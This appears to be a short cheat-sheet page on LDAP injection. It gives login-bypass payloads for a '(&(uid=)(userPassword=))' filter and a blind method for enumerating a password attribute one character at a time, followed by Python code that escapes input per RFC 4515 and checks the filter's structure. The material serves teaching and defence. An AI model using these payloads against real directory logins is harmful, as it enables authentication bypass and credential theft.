
Basic LDAP Injection

# Classic request: (&(uid=)(userPassword=))
# So the result is TRUE if uid AND userPassword are true
# You can put ')' in the request to crash it and see the request

username : *)(|(uid=*
password : )
→ (&(uid=*)(|(uid=*)(userPassword=)))

OR

username : *
password : *)(&
→ (&(uid=*)(userPassword=*)(&))

Blind LDAP Injection

# You have to find or guess how the request is built
# Test using only one char → OK → the request is (mail=*[text]*)
# You can try (mail=*)(sn=*) → )(sn= → OK
# Then, the password attribute
(mail=*)(password=*) → OK
@*)(password=x → FALSE
@*)(password=d → TRUE
# You can then enumerate each char
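The login filter above, rebuilt with RFC 4515 escaping and a structure check, as an added example that is not part of the original page. The function names and `EXPECTED_SHAPE` are hypothetical, and the inputs are the two login payloads already listed above plus one constructed benign pair.

```python
import re

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
RFC4515_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Structure the application intends: one AND over exactly two attributes.
EXPECTED_SHAPE = ["&", "uid", "userPassword"]


def escape_filter_value(value: str) -> str:
    """Replace filter metacharacters with their \\XX hex escapes."""
    return "".join(RFC4515_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(uid: str, password: str) -> str:
    """Vulnerable pattern from the page: input is concatenated as-is."""
    return f"(&(uid={uid})(userPassword={password}))"


def build_filter_safe(uid: str, password: str) -> str:
    """Same filter, with both values escaped before concatenation."""
    return (f"(&(uid={escape_filter_value(uid)})"
            f"(userPassword={escape_filter_value(password)}))")


def filter_shape(ldap_filter: str) -> list[str]:
    """List operators and attribute names in order, ignoring the values."""
    return re.findall(r"\(([&|!]|[^=()]+(?==))", ldap_filter)


def is_tampered(ldap_filter: str) -> bool:
    """True when user input changed the filter's structure."""
    return filter_shape(ldap_filter) != EXPECTED_SHAPE


if __name__ == "__main__":
    # Constructed inputs: the two login payloads listed on this page, then a benign pair.
    for uid, pw in [("*)(|(uid=*", ")"), ("*", "*)(&"), ("alice", "s3cret")]:
        unsafe, safe = build_filter_unsafe(uid, pw), build_filter_safe(uid, pw)
        print(f"unsafe {unsafe:45} tampered={is_tampered(unsafe)}")
        print(f"safe   {safe:45} tampered={is_tampered(safe)}")
```

The shape check does not flag a bare `*` in a value, because a wildcard leaves the structure unchanged, so escaping stays the primary control and the check serves as a logging or alerting aid.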


Last updated 1 year ago
